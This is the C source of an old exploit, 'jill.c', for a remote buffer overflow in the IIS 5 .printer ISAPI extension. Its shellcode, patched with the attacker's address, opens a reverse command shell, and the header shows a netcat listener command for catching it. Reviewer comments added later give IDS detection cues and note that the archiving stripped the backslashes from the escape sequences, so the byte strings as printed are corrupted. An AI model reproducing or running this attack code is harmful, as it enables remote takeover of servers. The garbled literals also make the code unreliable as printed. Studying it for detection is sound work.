
# Title : MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2)
# Published : 2001-05-08
# Author : dark spyrit


/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
 *
 *  by: dark spyrit <dspyrit@beavuh.org>
 *
 *  respect to eeye for finding this one - nice work.
 *  shouts to halvar, neofight and the beavuh bitchez.
 *
 *  this exploit overwrites an exception frame to control eip and get to
 *  our code.. the code then locates the pointer to our larger buffer and
 *  execs.
 *
 *  usage: jill <victim host> <victim port> <attacker host> <attacker port>
 *
 *  the shellcode spawns a reverse cmd shell.. so you need to set up a
 *  netcat listener on the host you control.
 *
 *  Ex: nc -l -p <attacker port> -vv
 *
 *  I haven't slept in years.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

/*
 * Entry point.  Builds the fixed HTTP request below, patches the
 * attacker host/port into it, connects to <victim host>:<victim port>
 * and writes the request once.  From a defensive standpoint the
 * on-the-wire observable is a GET for "/NULL.printer" carrying a
 * "Beavuh:" header and a "Host:" header several hundred bytes long
 * made almost entirely of 0x90 bytes; that shape is what an IDS rule
 * or reverse-proxy length check for this bug should key on.
 *
 * argv[1] victim host, argv[2] victim port, argv[3] attacker host,
 * argv[4] attacker port.  Exits 1 on bad usage or on any resolver,
 * socket or connect failure; 0 after the single write.
 *
 * NOTE(review): as archived, every escape sequence in this file has
 * lost its backslash ("x47" rather than "\x47", "n" rather than "\n"),
 * so the literals below read as plain ASCII text.  The byte values
 * mentioned in the comments are read from the hex pairs as printed.
 */
int main(int argc, char *argv[]){

/* the whole request rolled into one, pretty huh? carez. */

unsigned char sploit[]=
  /* request line + first header: "GET /NULL.printer HTTP/1.0\r\nBeavuh: " */
  "x47x45x54x20x2fx4ex55x4cx4cx2ex70x72x69x6ex74x65x72x20"
  "x48x54x54x50x2fx31x2ex30x0dx0ax42x65x61x76x75x68x3ax20"
  /* header value: 0x90 sled, then the encoded payload.  The bytes
   * x80x30x95 two lines down look like an XOR-0x95 decoder, which is
   * presumably why the host/port are XORed with 0x95 before being
   * patched in further below -- verify against the disassembly. */
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90x90"
  "x8bxc5x33xc9x66xb9xd7x02x50x80x30x95x40xe2xfax2dx95x95"
  "x64xe2x14xadxd8xcfx05x95xe1x96xddx7ex60x7dx95x95x95x95"
  "xc8x1ex40x14x7fx9ax6bx6ax6ax1ex4dx1exe6xa9x96x66x1exe3"
  "xedx96x66x1exebxb5x96x6ex1exdbx81xa6x78xc3xc2xc4x1exaa"
  "x96x6ex1ex67x2cx9bx95x95x95x66x33xe1x9dxccxcax16x52x91"
  "xd0x77x72xccxcaxcbx1ex58x1exd3xb1x96x56x44x74x96x54xa6"
  "x5cxf3x1ex9dx1exd3x89x96x56x54x74x97x96x54x1ex95x96x56"
  "x1ex67x1ex6bx1ex45x2cx9ex95x95x95x7dxe1x94x95x95xa6x55"
  "x39x10x55xe0x6cxc7xc3x6axc2x41xcfx1ex4dx2cx93x95x95x95"
  "x7dxcex94x95x95x52xd2xf1x99x95x95x95x52xd2xfdx95x95x95"
  "x95x52xd2xf9x94x95x95x95xffx95x18xd2xf1xc5x18xd2x85xc5"
  "x18xd2x81xc5x6axc2x55xffx95x18xd2xf1xc5x18xd2x8dxc5x18"
  "xd2x89xc5x6axc2x55x52xd2xb5xd1x95x95x95x18xd2xb5xc5x6a"
  "xc2x51x1exd2x85x1cxd2xc9x1cxd2xf5x1exd2x89x1cxd2xcdx14"
  "xdaxd9x94x94x95x95xf3x52xd2xc5x95x95x18xd2xe5xc5x18xd2"
  "xb5xc5xa6x55xc5xc5xc5xffx94xc5xc5x7dx95x95x95x95xc8x14"
  "x78xd5x6bx6ax6axc0xc5x6axc2x5dx6axe2x85x6axc2x71x6axe2"
  "x89x6axc2x71xfdx95x91x95x95xffxd5x6axc2x45x1ex7dxc5xfd"
  "x94x94x95x95x6axc2x7dx10x55x9ax10x3fx95x95x95xa6x55xc5"
  "xd5xc5xd5xc5x6axc2x79x16x6dx6ax9ax11x02x95x95x95x1ex4d"
  "xf3x52x92x97x95xf3x52xd2x97x8exacx52xd2x91x5ex38x4cxb3"
  "xffx85x18x92xc5xc6x6axc2x61xffxa7x6axc2x49xa6x5cxc4xc3"
  "xc4xc4xc4x6axe2x81x6axc2x59x10x55xe1xf5x05x05x05x05x15"
  "xabx95xe1xbax05x05x05x05xffx95xc3xfdx95x91x95x95xc0x6a"
  "xe2x81x6axc2x4dx10x55xe1xd5x05x05x05x05xffx95x6axa3xc0"
  "xc6x6axc2x6dx16x6dx6axe1xbbx05x05x05x05x7ex27xffx95xfd"
  "x95x91x95x95xc0xc6x6axc2x69x10x55xe9x8dx05x05x05x05xe1"
  "x09xffx95xc3xc5xc0x6axe2x8dx6axc2x41xffxa7x6axc2x49x7e"
  "x1fxc6x6axc2x65xffx95x6axc2x75xa6x55x39x10x55xe0x6cxc4"
  "xc7xc3xc6x6ax47xcfxccx3ex77x7bx56xd2xf0xe1xc5xe7xfaxf6"
  "xd4xf1xf1xe7xf0xe6xe6x95xd9xfaxf4xf1xd9xfcxf7xe7xf4xe7"
  "xecxd4x95xd6xe7xf0xf4xe1xf0xc5xfcxe5xf0x95xd2xf0xe1xc6"
  "xe1xf4xe7xe1xe0xe5xdcxfbxf3xfaxd4x95xd6xe7xf0xf4xe1xf0"
  "xc5xe7xfaxf6xf0xe6xe6xd4x95xc5xf0xf0xfexdbxf4xf8xf0xf1"
  "xc5xfcxe5xf0x95xd2xf9xfaxf7xf4xf9xd4xf9xf9xfaxf6x95xc2"
  "xe7xfcxe1xf0xd3xfcxf9xf0x95xc7xf0xf4xf1xd3xfcxf9xf0x95"
  "xc6xf9xf0xf0xe5x95xd0xedxfcxe1xc5xe7xfaxf6xf0xe6xe6x95"
  "xd6xf9xfaxe6xf0xddxf4xfbxf1xf9xf0x95xc2xc6xdaxd6xdexa6"
  "xa7x95xc2xc6xd4xc6xe1xf4xe7xe1xe0xe5x95xe6xfaxf6xfexf0"
  "xe1x95xf6xf9xfaxe6xf0xe6xfaxf6xfexf0xe1x95xf6xfaxfbxfb"
  "xf0xf6xe1x95xe6xf0xfbxf1x95xe7xf0xf6xe3x95xf6xf8xf1xbb"
  /* "...\r\nHost: " followed by a long run of 0x90 -- this oversized
   * Host header is the part that overruns the .printer ISAPI buffer and
   * is the most reliable thing to alert on. */
  "xf0xedxf0x95x0dx0ax48x6fx73x74x3ax20x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
  /* short non-0x90 tail: the small stub the file header describes
   * (finds the pointer to the larger buffer), then the overwritten
   * frame value, then "\r\n\r\n" ending the request. */
  "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x33"
  "xc0xb0x90x03xd8x8bx03x8bx40x60x33xdbxb3x24x03xc3xffxe0"
  "xebxb9x90x90x05x31x8cx6ax0dx0ax0dx0a";

  int       s;
  unsigned short int  a_port;
  unsigned long    a_host;   /* written for 32-bit unsigned long; see the h_addr read below */
  struct hostent    *ht;
  struct sockaddr_in  sin;   /* never zeroed: sin_zero is left uninitialised */

  /* NOTE(review): "n" here (and in the other printf calls) is the
   * archival remnant of "\n"; the strings are left exactly as found. */
  printf("iis5 remote .printer overflow.n"
    "dark spyrit <dspyrit@beavuh.org> / beavuh labs.n");

  if (argc != 5){
    printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>n",argv[0]);
    exit(1);
  }
  
  /* resolve the victim; ht is reused below for the attacker host */
  if ((ht = gethostbyname(argv[1])) == 0){
    herror(argv[1]);
    exit(1);
  }
  
  /* ports come straight from atoi(): no range or error checking */
  sin.sin_port = htons(atoi(argv[2]));
  a_port = htons(atoi(argv[4]));
  a_port^=0x9595;   /* pre-encoded with the payload's XOR key (see the note on the decoder above) */

  sin.sin_family = AF_INET;
  sin.sin_addr = *((struct in_addr *)ht->h_addr);
  
  if ((ht = gethostbyname(argv[3])) == 0){
    herror(argv[3]);
    exit(1);
  }
  
  /* reads sizeof(unsigned long) bytes out of a 4-byte IPv4 h_addr entry;
   * only correct where unsigned long is 32 bits */
  a_host = *((unsigned long *)ht->h_addr);
  a_host^=0x95959595;

  /* patch the (XOR-encoded) attacker port and address into the payload
   * at fixed offsets, little-endian; the offsets are hard-coded against
   * the byte layout of sploit[] and are not checked against its size */
  sploit[441]= (a_port) & 0xff;
  sploit[442]= (a_port >> 8) & 0xff;

  sploit[446]= (a_host) & 0xff;
  sploit[447]= (a_host >> 8) & 0xff;
  sploit[448]= (a_host >> 16) & 0xff;
  sploit[449]= (a_host >> 24) & 0xff;

  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    perror("socket");
    exit(1);
  }
  
  printf("nconnecting... n");
  if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
    perror("connect");
    exit(1);
  }
  
  /* single unchecked write; strlen() stops at the first 0x00 byte, so
   * the length sent depends on the payload containing none */
  write(s, sploit, strlen(sploit));
  sleep (1);
  close (s);
  
  printf("sent... nyou may need to send a carriage on your listener if the shell doesn't appear.nhave fun!n");
  exit(0);
}  

